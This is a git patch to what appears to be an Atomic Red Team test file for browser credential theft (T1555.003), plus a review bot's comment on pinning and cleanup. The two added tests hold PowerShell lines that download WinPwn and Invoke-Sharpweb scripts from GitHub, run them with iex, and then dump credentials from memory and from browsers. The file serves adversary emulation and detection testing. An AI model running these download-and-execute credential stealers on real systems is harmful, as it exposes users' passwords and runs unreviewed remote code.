From 73f3c752a4fc9a9749d9be00ec06ca1d11aa5d0b Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 20:56:38 -0500
Subject: [PATCH] Update T1555.003.yaml (#1949)
* Update T1555.003.yaml Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
* Update T1555.003.yaml added mimi-kittenz for extracting juicy info from memory and Sharpweb gathering Browser Credentials
* Update T1555.003.yaml update
Co-authored-by: Carrie Roberts
---
atomics/T1555.003/T1555.003.yaml | 21 ++++++++++++++++++++-
1 file changed, 20 insertions(+), 1 deletion(-)
diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
index a455107a..e663f5ef 100644
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -348,4 +348,23 @@ atomic_tests:
 browserpwn -consoleoutput -noninteractive
 cleanup_command: |-
 rm .\System.Data.SQLite.dll -ErrorAction Ignore
- name: powershell
\ No newline at end of file
+ name: powershell
+- name: WinPwn - Loot local Credentials - mimi-kittenz
+ description: Loot local Credentials - mimi-kittenz technique via function of WinPwn - Extend timeout to 600s
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ kittenz -consoleoutput -noninteractive
+ name: powershell
+- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials
+ description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
+ Invoke-Sharpweb -command "all"
+ name: powershell
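Review bot: The Sharpweb test's `command` fetches `Invoke-Sharpweb.ps1` from the moving `master` branch and pipes it straight into `iex`, so the code this atomic runs on a test host can change upstream without any review here. The mimi-kittenz test added just before it pins `WinPwn.ps1` to commit `121dcee26a7aca368821563cbe92b2b5638c5773`; the Sharpweb URL should be pinned the same way, i.e. `.../S3cur3Th1sSh1t/PowerSharpPack/<PINNED_COMMIT_SHA>/PowerSharpBinaries/Invoke-Sharpweb.ps1`. In the mimi-kittenz test, `$S3cur3Th1sSh1t_repo` is set to the account root with no commit, so anything WinPwn resolves through that variable is presumably unpinned as well and worth confirming. Neither new test has a `cleanup_command`, unlike the preceding test which removes `System.Data.SQLite.dll`; if these functions leave files on disk, a matching cleanup should be added. The description's "Extend timeout to 600s" names no setting in the test itself, so it should say where the operator applies that timeout.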